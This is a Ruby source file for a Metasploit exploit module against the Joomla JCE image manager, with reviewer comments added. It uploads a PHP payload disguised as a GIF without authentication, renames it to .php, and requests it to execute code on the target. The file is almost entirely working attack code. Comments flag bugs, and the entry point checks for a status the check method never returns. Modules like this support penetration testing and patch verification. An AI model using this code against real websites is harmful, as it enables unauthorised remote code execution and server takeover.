Path: blob/master/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for the JCE image manager file upload in Joomla!.
#
# Flow (see #exploit): #check probes the component version via #get_version,
# #upload_gif posts a GIF-prefixed PHP file through the image manager form,
# #renamed? asks the component to rename it to .php, and #call_payload requests
# the renamed file.
#
# Instance state shared between methods:
#   @uri_base / @vars_get_base - set in #get_version, read by #upload_gif and #renamed?
#   @payload_name              - set in #upload_gif, read by #renamed?, #call_payload, #exploit
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata plus the single TARGETURI option (Joomla base path, default "/").
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
      'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
      },
      'Author' =>
        [
          'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
          'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['OSVDB', '74839'],
          ['EDB', '17734'],
          ['BID', '49338']
        ],
      'Payload' =>
        {
          'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
          'DisableNops' => true,
          'BadChars' => "#",
          'Keys' => ['php']
        },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'Privileged' => false,
      'DisclosureDate' => '2012-08-02',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
      ])
  end


  # Fetch the image manager page and pull the version out of its <title>.
  #
  # Side effects: sets @uri_base (index.php under TARGETURI) and @vars_get_base
  # (the com_jce / imgmanager query parameters) that #upload_gif and #renamed?
  # reuse. Detection note: every request this module sends carries those same
  # query parameters, so "option=com_jce&task=plugin&plugin=imgmanager" is the
  # constant string a web server log will show for this activity.
  #
  # @return [String, nil] the text captured after "Image Manager :" in the title,
  #   or nil when there is no response, the status is not 200, or the title
  #   does not match
  def get_version
    # check imgmanager version
    @uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
    @vars_get_base = {
      'option'=> 'com_jce',
      'task' => 'plugin',
      'plugin'=> 'imgmanager',
      'file' => 'imgmanager'
    }
    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri' => @uri_base,
      'vars_get' => @vars_get_base,
      'method' => 'GET',
      'version' => '1.1'
    })

    version = nil
    if (res and res.code == 200)
      # $1 is nil when the regex did not match, so version stays nil in that case
      res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
      version = $1.nil? ? nil : $1
    end

    return version
  end

  # Classify the target from the version string returned by #get_version.
  #
  # @return [Exploit::CheckCode] Appears when the version matches
  #   %r{1\.5\.7\.1[0-4]?}, Safe otherwise (including when no version was found)
  def check
    version = ( get_version || '').to_s

    # NOTE(review): the pattern is unanchored and the trailing [0-4] is optional,
    # so any version string containing "1.5.7.1" matches (e.g. "1.5.7.15" as well).
    if (version.match(%r{1\.5\.7\.1[0-4]?}))
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end


  # Upload the payload as a .gif through the image manager's multipart form.
  # The file body starts with the "GIF89a" bytes so it passes as a GIF, followed
  # by the encoded PHP payload inside a <?php ?> block.
  #
  # Requires @uri_base / @vars_get_base from #get_version. Sets @payload_name
  # (six random lowercase letters) for the later rename and callback.
  #
  # @return [Symbol] :access_denied when the response body contains "RESTRICTED",
  #   :abort when no response came back, :success otherwise
  def upload_gif
    # add GIF header
    cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"

    # Generate some random strings
    @payload_name = rand_text_alpha_lower(6)
    boundary = '-' * 27 + rand_text_numeric(11)

    # query string: the base imgmanager parameters plus method=form
    parms = {'method'=> 'form'}
    parms.merge!(@vars_get_base)

    # POST data
    post_data = Rex::MIME::Message.new
    post_data.bound = boundary
    post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
    post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
    post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
    post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
    post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

    data = post_data.to_s

    res = send_request_cgi({
      'uri' => @uri_base,
      'vars_get' => parms,
      'method' => 'POST',
      'version' => '1.1',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    # NOTE(review): `res.code = 200` is an assignment, not a comparison, so this
    # condition reduces to "res is non-nil"; the else branch only runs when
    # send_request_cgi returned nothing, never on a non-200 status.
    if (res and res.code = 200 )
      return :access_denied if (res.body =~ /RESTRICTED/i)
      print_good("Successfully uploaded #{@payload_name}.gif")
    else
      print_error("Error uploading #{@payload_name}.gif")
      return :abort
    end

    return :success

  end

  # Ask the image manager to rename the uploaded .gif to .php through its JSON
  # "folderRename" action (form-encoded json= body with an X-Request: JSON header).
  #
  # Requires @uri_base / @vars_get_base from #get_version and @payload_name
  # from #upload_gif.
  #
  # @return [Boolean] true on an HTTP 200 response, false otherwise
  def renamed?
    # Rename the file from .gif to .php

    data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

    print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

    res = send_request_cgi(
      {
        'uri' => @uri_base,
        'vars_get' => @vars_get_base,
        'method' => 'POST',
        'version' => '1.1',
        'data' => data,
        'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
        'headers' =>
        {
          'X-Request' => 'JSON'
        }
      })
    if (res and res.code == 200 )
      print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
      return true
    else
      print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
      return false
    end
  end

  # Request the renamed .php file under images/stories below TARGETURI so the
  # server executes it. The response is not inspected.
  #
  # @return [Object, nil] whatever send_request_cgi returns (it is the last
  #   expression); #exploit ignores the value
  def call_payload
    payload = "#{@payload_name}.php"
    print_status("Calling payload: #{payload}")
    uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'version' => '1.1'
    })
  end



  # Entry point: check, upload, rename, register the .php for cleanup
  # (Msf::Exploit::FileDropper) and trigger it. Each step runs only if the
  # previous one succeeded.
  def exploit

    return if not check == Exploit::CheckCode::Vulnerable
    if upload_gif == :success
      if renamed?
        # FileDropper removes the renamed file after the session is established
        register_files_for_cleanup("#{@payload_name}.php")
        call_payload
      end
    end

  end
end

